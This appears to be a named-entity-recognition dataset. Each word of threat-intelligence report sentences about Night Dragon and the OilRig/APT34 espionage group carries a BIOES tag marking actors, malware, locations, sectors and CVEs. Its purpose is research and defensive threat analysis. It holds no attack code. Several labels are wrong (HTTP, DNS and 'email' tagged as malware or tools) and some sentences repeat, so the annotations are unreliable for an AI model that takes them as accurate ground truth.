O + +Attackers S-APT +using O +several O +locations O +in O +China S-LOC +have O +leveraged O +C&C S-TOOL +servers O +on O +purchased O +hosted O +services O +in O +the O +United B-LOC +States E-LOC +and O +compromised O +servers O +in O +the O +Netherlands S-LOC +to O +wage O +attacks O +against O +global O +oil S-IDTY +, O +gas S-IDTY +, O +and O +petrochemical B-IDTY +companies E-IDTY +, O +as O +well O +as O +individuals O +and O +executives S-IDTY +in O +Kazakhstan S-LOC +, O +Taiwan S-LOC +, O +Greece S-LOC +, O +and O +the O +United B-LOC +States E-LOC +to O +acquire O +proprietary O +and O +highly O +confidential O +information O +. O + +Attackers S-APT +using O +several O +locations O +in O +China S-LOC +have O +leveraged O +C&C S-TOOL +servers O +on O +purchased O +hosted O +services O +in O +the O +United B-LOC +States E-LOC +and O +compromised O +servers O +in O +the O +Netherlands S-LOC +to O +wage O +attacks O +against O +global O +oil S-IDTY +, O +gas S-IDTY +, O +and O +petrochemical B-IDTY +companies E-IDTY +, O +as O +well O +as O +individuals O +and O +executives S-IDTY +in O +Kazakhstan S-LOC +, O +Taiwan S-LOC +, O +Greece S-LOC +, O +and O +the O +United B-LOC +States E-LOC +to O +acquire O +proprietary O +and O +highly O +confidential O +information O +. O + +The O +primary O +operational O +technique O +used O +by O +Night B-APT +Dragon E-APT +comprised O +a O +variety O +of O +hacker O +tools O +, O +including O +privately O +developed O +and O +customized O +RAT B-MAL +tools E-MAL +that O +provided O +complete O +remote O +administration O +capabilities O +to O +the O +attacker S-APT +. O + +While O +Night B-ACT +Dragon I-ACT +attacks E-ACT +focused O +specifically O +on O +the O +energy B-IDTY +sector E-IDTY +, O +the O +tools O +and O +techniques O +of O +this O +kind O +can O +be O +highly O +successful O +when O +targeting O +any O +industry O +. 
O + +In O +addition O +, O +the O +attackers S-APT +employed O +hacking O +tools O +of O +Chinese S-LOC +origin O +and O +that O +are O +prevalent O +on O +Chinese S-LOC +underground O +hacking O +forums O +. O + +We O +have O +been O +presented O +with O +a O +rare O +opportunity O +to O +see O +some O +development B-ACT +activities E-ACT +from O +the O +actors S-APT +associated O +with O +the O +OilRig B-ACT +attack I-ACT +campaign E-ACT +, O +a O +campaign O +Unit B-SECTEAM +42 E-SECTEAM +has O +been O +following O +since O +May B-TIME +2016 E-TIME +. O + +Recently O +we O +were O +able O +to O +observe O +these O +actors S-APT +making O +modifications O +to O +their O +Clayslide B-MAL +delivery I-MAL +documents E-MAL +in O +an O +attempt O +to O +evade O +antivirus O +detection O +. O + +We O +collected O +two O +sets O +of O +Clayslide B-MAL +samples E-MAL +that O +appear O +to O +be O +created O +during O +the O +OilRig B-APT +actor E-APT +'s O +development O +phase O +of O +their O +attack O +lifecycle O +. O + +On O +November B-TIME +15 I-TIME +, I-TIME +2016 E-TIME +, O +an O +actor S-APT +related O +to O +the O +OilRig B-ACT +campaign E-ACT +began O +testing O +the O +Clayslide B-MAL +delivery I-MAL +documents E-MAL +. O + +The O +actor S-APT +then O +made O +subtle O +modifications O +to O +the O +file O +and O +uploaded O +the O +newly O +created O +file O +to O +the O +same O +popular O +antivirus O +testing O +website O +in O +order O +to O +determine O +how O +to O +evade O +detection O +. O + +In O +addition O +to O +making O +changes O +to O +the O +Excel B-ACT +worksheets E-ACT +that O +contain O +the O +decoy O +content O +, O +the O +actor S-APT +also O +made O +changes O +to O +the O +worksheet O +that O +is O +initially O +displayed O +to O +the O +user O +. 
O + +Taking O +a O +step O +back O +, O +as O +discussed O +in O +the O +Appendix O +in O +our O +initial O +OilRig S-APT +blog O +, O +Clayslide B-FILE +delivery I-FILE +documents E-FILE +initially O +open O +with O +a O +worksheet O +named O +" O +Incompatible O +" O +that O +displays O +content O +that O +instructs O +the O +user O +to O +" O +Enable O +Content O +" O +to O +see O +the O +contents O +of O +the O +document O +, O +which O +in O +fact O +runs O +the O +malicious O +macro O +and O +compromises O +the O +system O +. O + +This O +realization O +suggests O +that O +the O +OilRig S-APT +threat O +group O +will O +continue O +to O +use O +their O +delivery B-MAL +documents E-MAL +for O +extended O +periods O +with O +subtle O +modifications O +to O +remain O +effective O +. O + +Iranian S-LOC +threat O +agent O +OilRig S-APT +has O +been O +targeting O +multiple O +organisations O +in O +Israel S-LOC +and O +other O +countries O +in O +the O +Middle B-LOC +East E-LOC +since O +the O +end B-TIME +of I-TIME +2015 E-TIME +. O + +In O +recent O +attacks O +they O +set O +up O +a O +fake O +VPN B-MAL +Web I-MAL +Portal E-MAL +and O +targeted O +at O +least O +five O +Israeli S-LOC +IT B-IDTY +vendors E-IDTY +, O +several O +financial B-IDTY +institutes E-IDTY +, O +and O +the O +Israeli B-IDTY +Post I-IDTY +Office E-IDTY +. O + +In O +these O +websites O +they O +hosted O +malware O +that O +was O +digitally O +signed O +with O +a O +valid O +, O +likely O +stolen B-MAL +code I-MAL +signing I-MAL +certificate E-MAL +. 
O + +In O +December B-TIME +2015 E-TIME +, O +Symantec S-SECTEAM +published O +a O +post O +about O +" O +two O +Iran-based S-LOC +attack B-APT +groups E-APT +that O +appear O +to O +be O +connected O +, O +Cadelle S-APT +and O +Chafer S-APT +" O +that O +" O +have O +been O +using O +Backdoor.Cadelspy S-MAL +and O +Backdoor.Remexi S-MAL +to O +spy O +on O +Iranian S-LOC +individuals O +and O +Middle B-LOC +Eastern E-LOC +organizations O +" O +. O + +In O +May B-TIME +2016 E-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +observed O +attacks O +of O +OilRig S-APT +primarily O +focused O +on O +financial B-IDTY +institutions E-IDTY +and O +technology B-IDTY +organizations E-IDTY +within O +Saudi B-LOC +Arabia E-LOC +. O + +In O +recent O +OilRig B-ACT +attacks E-ACT +, O +the O +threat O +actors S-APT +purport O +to O +be O +legitimate B-IDTY +service I-IDTY +providers E-IDTY +offering O +service O +and O +technical O +troubleshooting O +as O +a O +social B-IDTY +engineering E-IDTY +theme O +in O +their O +spear-phishing S-ACT +attacks E-ACT +. O + +The O +campaign O +appears O +highly O +targeted O +and O +delivers O +a O +backdoor O +we O +have O +called O +' O +Helminth S-MAL +' O +. O + +Artifacts O +identified O +within O +the O +malware O +samples O +related O +to O +these O +attacks O +also O +suggest O +the O +targeting O +of O +the O +defense B-IDTY +industry E-IDTY +in O +Saudi B-LOC +Arabia E-LOC +, O +which O +appears O +to O +be O +related O +to O +an O +earlier O +wave O +of O +attacks O +carried O +out O +in O +the O +fall B-TIME +of I-TIME +2015 E-TIME +. O + +In O +May B-TIME +2016 E-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +began O +researching O +attacks O +that O +used O +spear-phishing S-ACT +emails I-ACT +with I-ACT +attachments E-ACT +, O +specifically O +malicious O +Excel B-ACT +spreadsheets E-ACT +sent O +to O +financial B-IDTY +organizations E-IDTY +within O +Saudi B-LOC +Arabia E-LOC +. 
O + +Over O +the O +course O +of O +the O +attack B-ACT +campaign E-ACT +, O +we O +have O +observed O +two O +different O +variations O +of O +the O +Helminth B-MAL +backdoor E-MAL +, O +one O +written O +in O +VBScript O +and O +PowerShell S-TOOL +that O +was O +delivered O +via O +a O +macro O +within O +Excel B-ACT +spreadsheets E-ACT +and O +the O +other O +a O +standalone O +Windows B-ACT +executable E-ACT +. O + +FireEye S-SECTEAM +also O +reported O +on O +these O +attacks O +in O +a O +May B-TIME +22 E-TIME +blog O +post O +. O + +The O +executable O +variant O +of O +Helminth S-MAL +is O +installed O +with O +a O +dropper B-MAL +Trojan E-MAL +that O +we O +are O +tracking O +as O +the O +HerHer B-MAL +Trojan E-MAL +. O + +The O +Helminth S-MAL +executable O +variant O +is O +very O +similar O +in O +functionality O +to O +its O +script-based O +counterpart O +, O +as O +it O +also O +communicates O +with O +its O +C2 S-TOOL +server O +using O +both O +HTTP S-MAL +and O +DNS S-MAL +queries O +. O + +Helminth S-MAL +executable O +samples O +send O +artifacts O +within O +network B-ACT +beacons E-ACT +to O +its O +C2 S-TOOL +server O +that O +the O +Trojan S-MAL +refers O +to O +as O +a O +' O +Group O +' O +and O +' O +Name O +' O +. O + +It O +appears O +that O +the O +group O +values O +hardcoded O +into O +the O +malware O +is O +associated O +with O +the O +targeted O +organization O +, O +as O +several O +are O +Saudi B-LOC +Arabian E-LOC +organizations O +within O +the O +telecommunications S-IDTY +and O +defense B-IDTY +industries E-IDTY +. O + +It O +appears O +that O +the O +group O +values O +hardcoded O +into O +the O +malware O +is O +associated O +with O +the O +targeted O +organization O +, O +as O +several O +are O +Saudi B-LOC +Arabian E-LOC +organizations O +within O +the O +telecommunications S-IDTY +and O +defense B-IDTY +industries E-IDTY +. 
O + +This O +suggests O +that O +the O +threat O +actors S-APT +are O +not O +only O +focused O +on O +financial B-IDTY +organizations E-IDTY +, O +as O +their O +target O +set O +could O +include O +other O +industries O +as O +well O +. O + +The O +email S-TOOL +address O +edmundj@chmail.ir O +and O +the O +geolocation O +of O +Tehran S-LOC +, O +Iran S-LOC +, O +being O +of O +note O +. O + +The O +registrant O +information O +for O +kernel.ws O +also O +provided O +a O +geolocation O +of O +Tehran S-LOC +, O +IR S-LOC +and O +the O +email B-IDTY +provider E-IDTY +for O +the O +address O +used O +in O +checkgoogle.org O +was O +the O +same O +used O +for O +mydomain1607.com O +, O +chmail.ir O +. O + +The O +mydomain1110.com O +domain O +did O +not O +appear O +to O +reuse O +any O +of O +the O +previously O +observed O +WHOIS O +data O +artifacts O +, O +but O +did O +still O +give O +a O +geolocation O +of O +Tehran S-LOC +in O +addition O +to O +the O +use O +of O +an O +email S-TOOL +address O +linked O +to O +other O +domains O +thematically O +similar O +to O +the O +know O +command O +and O +control O +domains O +and O +are O +potentially O +related O +. O + +While O +researching O +the O +OilRig B-ACT +campaign E-ACT +, O +we O +have O +seen O +two O +waves O +of O +targeted B-ACT +attacks E-ACT +on O +Saudi B-LOC +Arabian E-LOC +organizations O +in O +which O +a O +group O +of O +threat O +actors S-APT +delivered O +the O +Helminth B-ACT +Trojan E-ACT +as O +a O +payload O +. O + +The O +two O +variants O +of O +Helminth S-MAL +do O +require O +different O +delivery O +methods O +, O +with O +the O +script O +variant O +relying O +on O +an O +Excel B-ACT +spreadsheet E-ACT +for O +delivery O +, O +while O +the O +executable B-ACT +variant E-ACT +is O +more O +traditional O +in O +the O +fact O +that O +it O +can O +be O +installed O +without O +a O +delivery O +document O +. 
O + +Since O +our O +first O +published O +analysis O +of O +the O +OilRig B-ACT +campaign E-ACT +in O +May B-TIME +2016 E-TIME +, O +we O +have O +continued O +to O +monitor O +this O +group O +for O +new O +activity O +. O + +Additionally O +, O +the O +scope O +of O +organizations O +targeted O +by O +this O +group O +has O +expanded O +to O +not O +only O +include O +organizations O +within O +Saudi B-LOC +Arabia E-LOC +, O +but O +also O +a O +company O +in O +Qatar S-LOC +and O +government B-IDTY +organizations E-IDTY +in O +Turkey S-LOC +, O +Israel S-LOC +and O +the O +United B-LOC +States E-LOC +. O + +The O +group O +behind O +the O +OilRig B-ACT +campaign E-ACT +continues O +to O +leverage O +spear-phishing S-ACT +emails S-TOOL +with O +malicious O +Microsoft B-ACT +Excel I-ACT +documents E-ACT +to O +compromise O +victims O +. O + +In O +addition O +to O +these O +instances O +, O +multiple O +Qatari B-IDTY +organizations E-IDTY +were O +the O +subject O +to O +spear B-ACT +phishing I-ACT +attacks E-ACT +carrying O +Helminth B-MAL +samples E-MAL +earlier O +this O +year O +. O + +While O +the O +malware O +deployed O +is O +not O +terribly O +sophisticated O +, O +it O +uses O +techniques O +such O +as O +DNS B-ACT +command I-ACT +and I-ACT +control E-ACT +( O +C2 S-TOOL +) O +that O +allows O +it O +to O +stay O +under O +the O +radar O +at O +many O +establishments O +. O + +Less O +than O +a O +week O +after O +Microsoft S-IDTY +issued O +a O +patch O +for O +CVE-2017-11882 S-VULID +on O +Nov. B-TIME +14 I-TIME +, I-TIME +2017 E-TIME +, O +FireEye S-SECTEAM +observed O +an O +attacker S-APT +using O +an O +exploit S-VULNAME +for O +the O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +to O +target O +a O +government B-IDTY +organization E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. 
O + +We O +assess O +this O +activity O +was O +carried O +out O +by O +a O +suspected O +Iranian S-LOC +cyber B-ACT +espionage E-ACT +threat O +group O +, O +whom O +we O +refer O +to O +as O +APT34 S-APT +, O +using O +a O +custom B-MAL +PowerShell I-MAL +backdoor E-MAL +to O +achieve O +its O +objectives O +. O + +This O +threat O +group O +has O +conducted O +broad O +targeting O +across O +a O +variety O +of O +industries O +, O +including O +financial S-IDTY +, O +government S-IDTY +, O +energy S-IDTY +, O +chemical S-IDTY +, O +and O +telecommunications S-IDTY +, O +and O +has O +largely O +focused O +its O +operations O +within O +the O +Middle B-LOC +East E-LOC +. O + +We O +assess O +that O +APT34 S-APT +works O +on O +behalf O +of O +the O +Iranian S-LOC +government O +based O +on O +infrastructure O +details O +that O +contain O +references O +to O +Iran S-LOC +, O +use O +of O +Iranian S-LOC +infrastructure O +, O +and O +targeting O +that O +aligns O +with O +nation-state O +interests O +. O + +APT34 S-APT +uses O +a O +mix O +of O +public B-MAL +and I-MAL +non-public I-MAL +tools E-MAL +, O +often O +conducting O +spear B-ACT +phishing I-ACT +operations E-ACT +using O +compromised B-MAL +accounts E-MAL +, O +sometimes O +coupled O +with O +social B-ACT +engineering I-ACT +tactics E-ACT +. O + +We O +believe O +APT34 S-APT +is O +involved O +in O +a O +long-term O +Cyber B-ACT +Espionage E-ACT +operation O +largely O +focused O +on O +reconnaissance O +efforts O +to O +benefit O +Iranian S-LOC +nation-state O +interests O +and O +has O +been O +operational O +since O +at O +least O +2014 S-TIME +. O + +In O +May B-TIME +2016 E-TIME +, O +we O +published O +a O +blog O +detailing O +a O +spear B-ACT +phishing I-ACT +campaign E-ACT +targeting O +banks S-IDTY +in O +the O +Middle B-LOC +East E-LOC +region O +that O +used O +macro-enabled O +attachments O +to O +distribute O +POWBAT S-MAL +malware S-MAL +. 
O + +In O +July B-TIME +2017 E-TIME +, O +we O +observed O +APT34 S-APT +targeting O +a O +Middle B-LOC +East E-LOC +organization O +using O +a O +PowerShell-based B-MAL +backdoor E-MAL +that O +we O +call O +POWRUNER S-MAL +and O +a O +downloader O +with O +domain O +generation O +algorithm O +functionality O +that O +we O +call O +BONDUPDATER S-MAL +, O +based O +on O +strings O +within O +the O +malware O +. O + +APT34 S-APT +loosely O +aligns O +with O +public O +reporting O +related O +to O +the O +group O +" O +OilRig S-APT +" O +. O + +The O +backdoor O +was O +delivered O +via O +a O +malicious O +.rtf B-FILE +file E-FILE +that O +exploited O +CVE-2017-0199 S-VULID +. O + +In O +this O +latest O +campaign O +, O +APT34 S-APT +leveraged O +the O +recent O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +CVE-2017-11882 S-VULID +to O +deploy O +POWRUNER S-MAL +and O +BONDUPDATER S-MAL +. O + +The O +vulnerability O +was O +patched O +by O +Microsoft S-IDTY +on O +Nov B-TIME +14 I-TIME +, I-TIME +2017 E-TIME +. O + +The O +vulnerability O +exists O +in O +the O +old O +Equation B-MAL +Editor E-MAL +( O +EQNEDT32.EXE S-MAL +) O +, O +a O +component O +of O +Microsoft S-IDTY +Office O +that O +is O +used O +to O +insert O +and O +evaluate O +mathematical O +formulas O +. O + +During O +the O +past O +few O +months O +, O +APT34 S-APT +has O +been O +able O +to O +quickly O +incorporate O +exploits O +for O +at O +least O +two O +publicly O +vulnerabilities O +( O +CVE-2017-0199 S-VULID +and O +CVE-2017-11882 S-VULID +) O +to O +target O +organizations O +in O +the O +Middle B-LOC +East E-LOC +. O + +The O +OilRig B-APT +group E-APT +( O +AKA O +APT34 S-APT +, O +Helix B-APT +Kitten E-APT +) O +is O +an O +adversary O +motivated O +by O +espionage S-ACT +primarily O +operating O +in O +the O +Middle B-LOC +East E-LOC +region O +. 
O + +We O +expect O +APT34 S-APT +will O +continue O +to O +evolve O +their O +malware O +and O +tactics O +as O +they O +continue O +to O +pursue O +access O +to O +entities O +in O +the O +Middle B-LOC +East E-LOC +region O +. O + +The O +OilRig B-APT +group E-APT +( O +AKA O +APT34 S-APT +, O +Helix B-APT +Kitten E-APT +) O +is O +an O +adversary O +motivated O +by O +espionage S-ACT +primarily O +operating O +in O +the O +Middle B-LOC +East E-LOC +region O +. O + +We O +first O +discovered O +this O +group O +in O +mid-2016 S-TIME +, O +although O +it O +is O +possible O +their O +operations O +extends O +earlier O +than O +that O +time O +frame O +. O + +Between O +May S-TIME +and O +June B-TIME +2018 E-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +observed O +multiple O +attacks O +by O +the O +OilRig B-APT +group E-APT +appearing O +to O +originate O +from O +a O +government B-IDTY +agency E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. O + +The O +use O +of O +script-based B-MAL +backdoors E-MAL +is O +a O +common O +technique O +used O +by O +the O +OilRig B-APT +group E-APT +as O +we O +have O +previously O +documented O +. O + +The O +attacks O +delivered O +a O +PowerShell B-MAL +backdoor E-MAL +called O +QUADAGENT S-MAL +, O +a O +tool O +attributed O +to O +the O +OilRig B-APT +group E-APT +by O +both O +ClearSky B-SECTEAM +Cyber I-SECTEAM +Security E-SECTEAM +and O +FireEye S-SECTEAM +. O + +A O +closer O +examination O +revealed O +the O +obfuscation O +used O +by O +the O +OilRig B-APT +group E-APT +in O +these O +QUADAGENT B-MAL +samples E-MAL +were O +likely O +the O +result O +of O +using O +an O +open-source O +toolkit O +called O +Invoke-Obfuscation S-MAL +. O + +All O +three O +waves O +involved O +a O +single O +spear B-ACT +phishing I-ACT +email E-ACT +that O +appeared O +to O +originate O +from O +a O +government B-IDTY +agency E-IDTY +based O +in O +the O +Middle B-LOC +East E-LOC +. 
O + +This O +latest O +attack O +consisted O +of O +three O +waves O +between O +May S-TIME +and O +June B-TIME +2018 E-TIME +. O + +The O +OilRig B-APT +group E-APT +continues O +to O +be O +a O +persistent O +adversary O +group O +in O +the O +Middle B-LOC +East E-LOC +region O +. O + +APT34 S-APT +are O +involved O +in O +long-term O +cyber B-ACT +espionage I-ACT +operations E-ACT +largely O +focused O +on O +the O +Middle B-LOC +East E-LOC +. O + +This O +threat O +group O +has O +conducted O +broad O +targeting O +across O +a O +variety O +of O +industries O +, O +including O +financial S-IDTY +, O +government S-IDTY +, O +energy S-IDTY +, O +chemical S-IDTY +, O +and O +telecommunications S-IDTY +. O + +Recent O +investigations O +by O +FireEye B-SECTEAM +'s I-SECTEAM +Mandiant E-SECTEAM +incident O +response O +consultants O +combined O +with O +FireEye B-SECTEAM +iSIGHT I-SECTEAM +Threat I-SECTEAM +Intelligence E-SECTEAM +analysis O +have O +given O +us O +a O +more O +complete O +picture O +of O +a O +suspected O +Iranian S-LOC +threat O +group O +, O +that O +we O +believe O +has O +been O +operating O +since O +at O +least O +2014 S-TIME +. O + +Join O +us O +in O +a O +live O +webinar O +as O +we O +discuss O +this O +threat O +group O +whom O +we O +assess O +to O +be O +working O +on O +behalf O +of O +the O +Iranian B-IDTY +Government E-IDTY +, O +with O +a O +mission O +that O +would O +benefit O +nation-state B-IDTY +geopolitical E-IDTY +and O +economic S-IDTY +needs O +. O + +On O +January B-TIME +8 I-TIME +, I-TIME +2018 E-TIME +, O +Unit B-SECTEAM +42 E-SECTEAM +observed O +the O +OilRig S-APT +threat O +group O +carry O +out O +an O +attack O +on O +an O +insurance B-IDTY +agency E-IDTY +based O +in O +the O +Middle B-LOC +East E-LOC +. 
O + +APT34 S-APT +uses O +a O +mix O +of O +public B-MAL +and I-MAL +non-public I-MAL +tools E-MAL +, O +often O +conducting O +spear B-ACT +phishing I-ACT +operations E-ACT +using O +compromised B-MAL +accounts E-MAL +from O +trusted O +third O +parties O +, O +sometimes O +coupled O +with O +social B-ACT +engineering I-ACT +tactics E-ACT +. O + +Just O +over O +a O +week O +later O +, O +on O +January B-TIME +16 I-TIME +, I-TIME +2018 E-TIME +, O +we O +observed O +an O +attack O +on O +a O +Middle B-LOC +Eastern E-LOC +financial B-IDTY +institution E-IDTY +. O + +The O +January B-ACT +8 I-ACT +attack E-ACT +used O +a O +variant O +of O +the O +ThreeDollars B-FILE +delivery I-FILE +document E-FILE +, O +which O +we O +identified O +as O +part O +of O +the O +OilRig S-APT +toolset O +based O +on O +attacks O +that O +occurred O +in O +August B-TIME +2017 E-TIME +. O + +However O +, O +the O +attack O +on O +January B-TIME +16 E-TIME +did O +not O +involve O +ThreeDollars S-MAL +at O +all O +. O + +Interestingly O +, O +the O +targeted O +organization O +in O +the O +January B-ACT +16 I-ACT +attack E-ACT +had O +already O +been O +targeted O +by O +the O +OilRig B-APT +group E-APT +a O +year O +ago O +on O +January B-TIME +2017 E-TIME +. O + +Instead O +, O +OilRig S-APT +'s O +attack O +involved O +delivering O +the O +OopsIE B-MAL +Trojan E-MAL +directly O +to O +the O +victim O +, O +most O +likely O +using O +a O +link O +in O +a O +spear B-ACT +phishing I-ACT +email E-ACT +. O + +In O +the O +January B-TIME +16 E-TIME +, O +2018 B-ACT +attack E-ACT +, O +we O +observed O +OilRig O +attacking O +an O +organization O +it O +previously O +targeted O +in O +January B-TIME +2017 E-TIME +. 
O + +On O +January B-TIME +8 I-TIME +, I-TIME +2018 E-TIME +, O +the O +OilRig S-APT +threat O +group O +sent O +an O +email S-ACT +with O +the O +subject O +Beirut O +Insurance O +Seminar O +Invitation O +to O +an O +insurance B-IDTY +agency E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. O + +The O +email S-ACT +contained O +an O +attachment O +named O +Seminar-Invitation.doc S-FILE +, O +which O +is O +a O +malicious O +Microsoft B-TOOL +Word E-TOOL +document O +we O +track O +as O +ThreeDollars S-MAL +. O + +This O +suggests O +that O +due O +to O +the O +January B-ACT +2017 I-ACT +attack E-ACT +, O +the O +targeted O +organization O +may O +have O +taken O +actions O +to O +counter O +known O +OilRig S-APT +TTPs O +, O +in O +this O +case O +delivering O +malicious O +macro O +documents O +, O +causing O +the O +OilRig S-APT +operators S-APT +to O +adopt O +a O +different O +delivery O +tactic O +. O + +We O +also O +identified O +another O +sample O +of O +ThreeDollars S-MAL +, O +created O +on O +January B-TIME +15 E-TIME +, O +2017 S-TIME +with O +the O +file O +name O +strategy O +preparation.dot S-FILE +. O + +The O +samples O +of O +ThreeDollars S-MAL +we O +collected O +in O +these O +attacks O +are O +structurally O +very O +similar O +to O +the O +first O +sample O +we O +analyzed O +in O +October B-TIME +2017 E-TIME +, O +down O +to O +the O +lure O +image O +used O +to O +trick O +the O +recipient O +into O +clicking O +the O +" O +Enable O +Content O +" O +button O +to O +execute O +the O +malicious O +macro O +. O + +Since O +May B-TIME +2016 E-TIME +, O +we O +have O +continued O +to O +monitor O +and O +uncover O +various O +attacks O +and O +tools O +associated O +with O +the O +OilRig B-APT +group E-APT +. O + +] O +com O +, O +which O +we O +previously O +identified O +in O +October B-TIME +2017 E-TIME +to O +be O +an O +OilRig S-APT +C2 S-TOOL +. 
O + +Based O +on O +previously O +observed O +tactics O +, O +it O +is O +highly O +likely O +the O +OilRig B-APT +group E-APT +leveraged O +credential B-MAL +harvesting E-MAL +and O +compromised B-MAL +accounts E-MAL +to O +use O +the O +government B-IDTY +agency E-IDTY +as O +a O +launching O +platform O +for O +their O +true O +attacks O +. O + +Inspecting O +the O +class O +C S-TOOL +network O +for O +185.162.235.0/24 O +shows O +us O +that O +another O +IP S-PROT +on O +the O +same O +network O +resolves O +to O +an O +OilRig S-APT +domain O +, O +msoffice-cdn.com O +which O +we O +identified O +in O +August B-TIME +2017 E-TIME +. O + +We O +had O +previously O +observed O +this O +author O +name O +in O +use O +once O +before O +, O +in O +the O +very O +first O +ThreeDollars B-FILE +document E-FILE +we O +collected O +that O +we O +had O +reported O +on O +in O +August B-TIME +2017 E-TIME +. O + +The O +OilRig B-APT +group E-APT +continues O +to O +remain O +a O +highly O +active O +adversary O +in O +the O +Middle B-LOC +East E-LOC +region O +. O + +Organizations O +detected O +a O +compromise O +themselves O +in O +62% O +of O +the O +cases O +that O +Mandiant S-SECTEAM +worked O +in O +2017 S-TIME +. O + +The O +group O +conducts O +operations O +primarily O +in O +the O +Middle B-LOC +East E-LOC +, O +targeting O +financial S-IDTY +, O +government S-IDTY +, O +energy S-IDTY +, O +chemical S-IDTY +, O +telecommunications S-IDTY +and O +other O +industries O +. O + +Repeated O +targeting O +of O +Middle B-LOC +Eastern E-LOC +financial S-IDTY +, O +energy S-IDTY +and O +government B-IDTY +organizations E-IDTY +leads O +FireEye S-SECTEAM +to O +assess O +that O +those O +sectors O +are O +a O +primary O +concern O +of O +APT34 S-APT +. 
O + +The O +use O +of O +infrastructure O +tied O +to O +Iranian S-LOC +operations O +, O +timing O +and O +alignment O +with O +the O +national O +interests O +of O +Iran S-LOC +also O +lead O +FireEye S-SECTEAM +to O +assess O +that O +APT34 S-APT +acts O +on O +behalf O +of O +the O +Iranian S-LOC +government O +. O + +APT34 S-APT +uses O +a O +mix O +of O +public O +and O +non-public O +tools O +and O +often O +uses O +compromised O +accounts O +to O +conduct O +spear-phishing S-ACT +operations O +. O + +In O +November B-TIME +2017 E-TIME +, O +APT34 S-APT +leveraged O +the O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +CVE-2017-11882 S-VULID +to O +deploy O +POWRUNER S-MAL +and O +BONDUPDATER S-MAL +less O +than O +a O +week O +after O +Microsoft S-IDTY +issued O +a O +patch O +. O + +Unit B-SECTEAM +42 E-SECTEAM +'s O +ongoing O +research O +into O +the O +OilRig B-ACT +campaign E-ACT +shows O +that O +the O +threat O +actors S-APT +involved O +in O +the O +original O +attack B-ACT +campaign E-ACT +continue O +to O +add O +new O +Trojans O +to O +their O +toolset O +and O +continue O +their O +persistent O +attacks O +in O +the O +Middle B-LOC +East E-LOC +. O + +When O +we O +first O +discovered O +the O +OilRig B-ACT +attack I-ACT +campaign E-ACT +in O +May B-TIME +2016 E-TIME +, O +we O +believed O +at O +the O +time O +it O +was O +a O +unique O +attack B-ACT +campaign E-ACT +likely O +operated O +by O +a O +known O +, O +existing O +threat O +group O +. O + +The O +email S-TOOL +address O +is O +associated O +with O +the O +Lebanese O +domain O +of O +a O +major O +global O +financial B-IDTY +institution E-IDTY +. O + +POWRUNER S-MAL +was O +delivered O +using O +a O +malicious B-MAL +RTF E-MAL +file O +that O +exploited O +CVE-2017-0199 S-VULID +. 
O + +In O +July B-TIME +2017 E-TIME +, O +we O +observed O +the O +OilRig B-APT +group E-APT +using O +a O +tool O +they O +developed O +called O +ISMAgent S-MAL +in O +a O +new O +set O +of O +targeted B-ACT +attacks E-ACT +. O + +In O +August B-TIME +2017 E-TIME +, O +we O +found O +this O +threat O +group O +has O +developed O +yet O +another O +Trojan S-MAL +that O +they O +call O +' O +Agent O +Injector O +' O +with O +the O +specific O +purpose O +of O +installing O +the O +ISMAgent B-MAL +backdoor E-MAL +. O + +On O +August B-TIME +23 I-TIME +, I-TIME +2017 E-TIME +, O +we O +observed O +OilRig S-APT +targeting O +an O +organization O +within O +the O +United B-LOC +Arab I-LOC +Emirates E-LOC +government S-IDTY +. O + +Based O +on O +that O +research O +and O +this O +observation O +, O +we O +postulate O +that O +the O +OilRig B-APT +group E-APT +gathered O +credentials O +to O +a O +legitimate O +user O +'s O +OWA O +account O +and O +logged O +into O +the O +user O +'s O +account O +to O +send O +phishing B-ACT +attacks E-ACT +to O +other O +individuals O +within O +the O +same O +, O +targeted O +organization O +. O + +The O +OilRig B-APT +group E-APT +continues O +to O +target O +organizations O +in O +the O +Middle B-LOC +East E-LOC +, O +in O +this O +instance O +targeting O +the O +government S-IDTY +of O +the O +United B-LOC +Arab I-LOC +Emirates E-LOC +. O + +The O +payload O +embedded O +within O +the O +ISMInjector B-MAL +sample E-MAL +delivered O +in O +this O +attack O +is O +a O +variant O +of O +the O +ISMAgent B-MAL +backdoor E-MAL +that O +we O +had O +discussed O +in O +detail O +in O +our O +blog O +discussing O +a O +targeted B-ACT +attack E-ACT +on O +a O +Saudi B-LOC +Arabian E-LOC +technology B-IDTY +company E-IDTY +. 
O + +Initial O +inspection O +of O +this O +attack O +suggested O +this O +was O +again O +the O +OilRig B-ACT +campaign E-ACT +using O +their O +existing O +toolset O +, O +but O +further O +examination O +revealed O +not O +only O +new O +variants O +of O +the O +delivery O +document O +we O +named O +Clayslide S-MAL +, O +but O +also O +a O +different O +payload O +embedded O +inside O +it O +. O + +In O +July B-TIME +2017 E-TIME +, O +we O +observed O +an O +attack O +on O +a O +Middle B-LOC +Eastern E-LOC +technology B-IDTY +organization E-IDTY +that O +was O +also O +targeted O +by O +the O +OilRig B-ACT +campaign E-ACT +in O +August B-TIME +2016 E-TIME +. O + +This O +technique O +was O +observed O +in O +previous O +Clayslide B-MAL +documents E-MAL +to O +access O +the O +script O +variant O +of O +the O +Helminth B-ACT +Trojan E-ACT +in O +earlier O +OilRig B-ACT +attacks E-ACT +. O + +In O +the O +past O +, O +we O +had O +primarily O +associated O +the O +OilRig B-ACT +campaign E-ACT +with O +using O +the O +Clayslide B-MAL +documents E-MAL +to O +deliver O +as O +a O +payload O +a O +Trojan S-MAL +we O +named O +Helminth S-MAL +; O +in O +this O +instance O +, O +the O +payload O +was O +instead O +a O +variant O +of O +the O +ISMDoor B-MAL +Trojan E-MAL +with O +significant O +modifications O +which O +we O +are O +now O +tracking O +as O +ISMAgent S-MAL +. O + +The O +June B-TIME +2017 E-TIME +sample O +of O +Clayslide S-MAL +contained O +the O +same O +OfficeServicesStatus.vbs B-FILE +file E-FILE +found O +in O +the O +ISMAgent B-MAL +Clayslide I-MAL +document E-MAL +, O +but O +instead O +of O +having O +the O +payload O +embedded O +in O +the O +macro O +as O +segregated O +base64 O +strings O +that O +would O +be O +concatenated O +, O +this O +variant O +obtained O +its O +payload O +from O +multiple O +cells O 